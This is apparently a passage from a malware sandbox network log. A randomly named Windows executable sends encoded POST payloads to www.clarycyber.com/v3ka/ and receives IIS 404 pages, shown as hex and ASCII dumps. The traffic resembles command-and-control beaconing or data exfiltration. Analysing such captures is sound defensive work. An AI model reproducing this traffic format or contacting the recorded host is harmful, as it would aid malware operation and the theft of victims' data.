78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Feb 28, 2024 15:46:36.248047113 CET	1286	IN	Data Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Feb 28, 2024 15:46:36.248102903 CET	1286	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Feb 28, 2024 15:46:36.248162031 CET	1286	IN	Data Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x8007000
Feb 28, 2024 15:46:36.568762064 CET	27	IN	Data Raw: 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a Data Ascii: </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	50253	62.149.128.45	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:38.772727013 CET	1070	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.clarycyber.com Origin: http://www.clarycyber.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.clarycyber.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4a 30 68 62 2b 5a 41 58 65 6f 58 49 61 47 61 35 4b 4c 62 47 38 74 56 47 36 58 4c 45 73 75 49 6b 74 46 2f 6a 32 52 69 54 5a 6e 31 58 37 36 4b 68 76 46 4a 69 36 74 75 41 36 44 4e 56 78 58 58 31 71 79 69 48 72 38 57 51 4c 6e 51 51 53 7a 56 63 35 68 78 2b 6e 47 6d 31 34 78 65 53 36 65 39 4a 32 4d 6a 6a 6f 54 65 32 77 35 51 68 42 2f 6e 6f 44 4b 50 67 4c 58 6a 4d 4d 41 47 41 4a 64 53 67 4c 39 57 73 48 72 30 77 78 4a 74 4f 34 4b 2f 46 57 54 68 72 46 4d 44 5a 57 39 48 4a 6a 68 73 4e 7a 30 47 55 30 38 46 73 6d 35 6a 47 4d 47 6f 5a 46 68 4d 52 59 62 68 79 34 76 56 4f 45 79 62 38 34 47 41 57 39 46 37 48 6e 35 54 37 64 79 56 4d 55 6b 39 2f 79 53 42 57 6b 35 63 79 72 77 79 52 4a 65 6b 52 51 5a 34 65 79 6d 52 51 59 61 75 6c 69 32 41 4e 4b 70 4a 47 6c 54 33 43 31 55 63 62 38 52 49 79 6c 74 6e 56 2f 58 61 41 32 34 6b 4f 74 76 51 31 4a 61 33 35 61 5a 6b 30 50 6a 72 6c 51 46 43 66 52 41 64 43 63 79 66 31 76 66 70 6c 5a 41 63 6a 57 39 31 4b 4f 48 78 4e 45 51 6e 6c 53 57 46 48 43 51 68 6f 33 73 38 4a 79 72 75 4a 49 6f 6f 38 6d 52 65 68 55 6b 6a 47 4b 63 4e 54 69 48 39 6f 75 32 6f 4a 61 33 69 53 4f 38 41 44 62 42 31 69 68 46 71 71 73 4f 35 63 4d 43 57 39 41 32 72 64 41 58 69 63 72 36 6b 6b 48 54 31 76 41 34 59 6d 63 34 48 52 4b 61 4d 68 66 55 76 51 34 77 66 74 4c 61 65 36 46 78 4e 58 4c 34 66 79 64 31 70 56 54 64 5a 59 36 39 57 49 67 34 62 69 6d 6d 76 4c 41 46 51 70 33 61 66 2f 41 51 4a 56 52 31 7a 2b 4e 71 74 64 53 77 55 44 66 59 75 67 62 48 51 79 2f 44 49 4b 58 2b 71 61 5a 67 42 49 6d 55 39 70 56 34 32 56 77 6c 76 41 39 5a 2f 2b 6c 44 66 61 53 78 2b 36 78 47 4d 3d Data Ascii: nf8dPP8p=E6oTgpeoekQCJ0hb+ZAXeoXIaGa5KLbG8tVG6XLEsuIktF/j2RiTZn1X76KhvFJi6tuA6DNVxXX1qyiHr8WQLnQQSzVc5hx+nGm14xeS6e9J2MjjoTe2w5QhB/noDKPgLXjMMAGAJdSgL9WsHr0wxJtO4K/FWThrFMDZW9HJjhsNz0GU08Fsm5jGMGoZFhMRYbhy4vVOEyb84GAW9F7Hn5T7dyVMUk9/ySBWk5cyrwyRJekRQZ4eymRQYauli2ANKpJGlT3C1Ucb8RIyltnV/XaA24kOtvQ1Ja35aZk0PjrlQFCfRAdCcyf1vfplZAcjW91KOHxNEQnlSWFHCQho3s8JyruJIoo8mRehUkjGKcNTiH9ou2oJa3iSO8ADbB1ihFqqsO5cMCW9A2rdAXicr6kkHT1vA4Ymc4HRKaMhfUvQ4wftLae6FxNXL4fyd1pVTdZY69WIg4bimmvLAFQp3af/AQJVR1z+NqtdSwUDfYugbHQy/DIKX+qaZgBImU9pV42VwlvA9Z/+lDfaSx+6xGM=
Feb 28, 2024 15:46:39.203196049 CET	1286	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Feb 2024 14:46:39 GMT Connection: close Content-Length: 4953 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Feb 28, 2024 15:46:39.203252077 CET	1286	IN	Data Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Feb 28, 2024 15:46:39.203305006 CET	1286	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Feb 28, 2024 15:46:39.203341961 CET	1286	IN	Data Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x8007000
Feb 28, 2024 15:46:39.523889065 CET	27	IN	Data Raw: 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a Data Ascii: </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	50254	62.149.128.45	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:41.614469051 CET	3858	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.clarycyber.com Origin: http://www.clarycyber.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.clarycyber.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4a 30 68 62 2b 5a 41 58 65 6f 58 49 61 47 61 35 4b 4c 62 47 38 74 56 47 36 58 4c 45 73 76 77 6b 74 58 6e 6a 6e 41 69 54 59 6e 31 58 6e 71 4b 67 76 46 4a 46 36 74 48 49 36 43 77 75 78 55 2f 31 71 42 71 48 6f 50 79 51 64 33 51 64 4f 6a 56 65 39 68 78 71 6e 47 72 73 34 78 4b 73 36 74 68 4a 6e 36 54 6a 71 55 71 70 79 70 51 72 42 2f 6e 6b 48 4b 50 33 4c 58 6e 63 4d 46 65 41 4a 66 57 67 4b 4a 2b 73 58 6f 73 77 34 35 74 4e 79 71 2f 61 66 7a 67 52 46 4d 2b 71 57 39 48 5a 6a 6a 41 4e 7a 33 69 55 31 2f 64 6a 6d 5a 6a 47 50 47 6f 61 54 52 41 4b 59 62 73 74 34 76 68 4f 45 77 4c 38 69 6d 41 57 74 55 37 47 75 35 53 77 5a 79 56 62 65 30 78 6e 79 55 73 6e 6b 35 49 79 72 47 65 52 49 70 49 52 57 37 41 65 78 47 52 53 63 61 75 49 6f 57 42 63 4b 70 5a 73 6c 53 58 53 31 54 6b 62 36 45 45 79 76 73 6e 61 70 48 62 46 35 59 6b 41 70 76 4d 35 4a 61 6d 69 61 5a 6c 70 50 6d 50 6c 51 32 4b 66 57 46 70 44 52 43 66 79 6b 2f 70 38 54 68 67 70 57 39 70 43 4f 48 4a 37 45 58 2f 6c 51 32 46 48 4a 52 67 2b 2f 63 38 4f 39 4c 75 66 4d 6f 6f 72 6d 52 53 48 55 6c 6e 77 4a 73 52 54 6a 30 46 6f 34 47 6f 47 49 6e 69 57 62 73 41 65 49 52 31 69 68 46 6e 5a 73 4f 31 63 4d 77 47 39 50 68 48 64 43 45 61 63 74 36 6b 75 48 54 31 2b 41 34 45 56 63 34 50 2f 4b 62 39 30 66 57 6a 51 34 6b 62 74 47 2b 4b 35 56 52 4e 65 50 34 66 68 53 56 6c 4f 54 64 56 51 36 39 48 39 67 71 76 69 68 6d 2f 4c 45 46 51 71 7a 36 66 34 44 51 49 41 48 46 4f 68 4e 71 67 6f 53 7a 49 54 66 61 75 67 59 69 35 36 74 54 30 6d 4b 76 75 4d 46 44 46 57 68 56 4e 4d 54 4a 32 76 77 48 2f 61 36 38 7a 32 6a 41 72 4d 43 45 2b 59 6e 77 43 57 6f 50 51 68 69 68 4e 75 2b 43 4f 38 56 44 78 2b 4a 6f 35 73 70 58 7a 74 36 73 44 54 6c 4d 51 47 37 62 58 6d 55 42 47 33 48 33 46 59 48 58 59 47 66 64 71 51 74 6f 2b 42 71 69 33 30 31 56 58 4a 79 4e 73 35 4b 57 75 7a 76 4c 47 49 6e 50 50 2b 50 6d 71 42 76 6a 4b 56 30 64 45 74 6e 47 67 74 74 73 43 4c 30 7a 69 30 63 57 4c 6f 4a 4b 45 47 50 77 46 31 75 52 49 39 55 73 4d 65 53 31 76 51 4f 34 57 74 61 63 6f 6c 57 62 50 74 30 62 58 4b 55 73 67 6c 46 56 35 35 37 6f 30 31 7a 4a 61 6e 58 55 41 54 6b 4e 63 73 36 62 2b 4f 47 58 35 79 70 51 65 2f 58 58 49 32 45 4d 67 64 37 6a 6c 30 63 34 78 42 34 2f 35 31 4e 31 72 4b 57 33 57 53 2b 77 48 77 69 2f 2f 65 4c 58 79 71 78 57 55 71 62 49 31 67 57 61 34 4e 4f 68 5a 38 2b 4a 50 65 44 47 4a 54 47 4d 51 65 63 49 74 47 61 70 77 78 66 38 2f 61 4b 2f 4e 72 35 58 31 65 6b 73 4a 76 76 59 54 47 41 71 4d 72 68 61 36 6a 32 51 71 73 53 65 32 78 38 6f 46 67 43 7a 5a 77 36 56 72 37 52 6a 2f 42 31 6b 58 49 76 56 53 41 78 65 6b 39 43 6f 63 6a 43 33 41 76 35 73 66 41 68 4e 77 63 4e 54 76 6e 6c 63 55 52 6d 31 70 78 47 6b 55 30 7a 71 48 73 34 2b 65 59 41 6b 44 79 73 48 34 54 62 57 2b 62 59 71 36 2f 4f 59 2f 79 6e 6b 42 79 57 64 6f 46 73 46 6e 71 43 41 57 74 31 63 71 42 55 41 6d 6a 50 35 76 78 6b 4c 6e 6e 67 6b 48 6e 44 44 6d 74 38 46 77 75 71 55 59 58 59 45 36 32 67 67 6d 34 74 53 30 65 73 6e 7a 33 71 72 78 54 46 55 57 65 46 53 41 66 58 35 66 38 7a 74 49 59 53 72 43 66 67 51 57 52 33 66 59 79 42 6f 31 38 33 70 33 72 2f 6a 58 74 4a 4c 77 54 4d 57 65 33 50 6d 37 55 4c 56 4b 75 59 68 6e 44 49 44 55 45 43 6c 45 46 38 77 64 39 61 4c 31 4b 31 48 47 38 79 6d 69 69 79 58 69 4b 78 68 55 56 70 47 67 78 69 57 58 31 4d 39 55 6e 46 43 66 75 51 79 79 62 44 32 32 4f 46 6c 73 69 36 67 38 47 58 71 4f 52 32 35 49 6d 62 41 47 59 36 69 42 41 68 4c 38 43 75 76 6f 69 44 36 68 61 59 55 61 4f 56 78 7a 44 64 79 2b 6b 61 73 5a 4f 2b 79 74 53 64 6b 53 47 42 58 65 66 44 39 66 44 76 71 76 6d 57 31 32 45 63 6b 77 31 44 30 77 46 4e 37 64 48 31 44 57 39 52 6f 6c 48 63 50 39 48 4d 50 2f 6a 71 4a 76 79 67 51 4e 41 58 57 55 6d 4a 67 4e 53 52 44 73 2f 30 6a 53 70 5a 75 5a 30 61 42 47 37 36 7a 32 6f 64 35 61 52 32 51 59 69 49 30 69 74 54 49 32 50 64 65 4a 65 59 6f 48 6d 6c 77 74 6b 41 42 56 62 65 50 61 36 46 6e 35 61 4d 71 5a 75 55 32 4d 41 68 7a 4b 59 45 69 58 78 4f 6e 71 51 61 44 6f 79 32 52 4a 51 35 39 4a 5a 7a 58 48 30 62 62 69 6a 33 6c 6e 56 4d 2f 4c 36 71 57 58 6c 4b 49 6d 57 58 38 63 2b 73 41 4f 6a 70 76 58 34 4e 77 50 6d 6e 78 Data Ascii: nf8dPP8p=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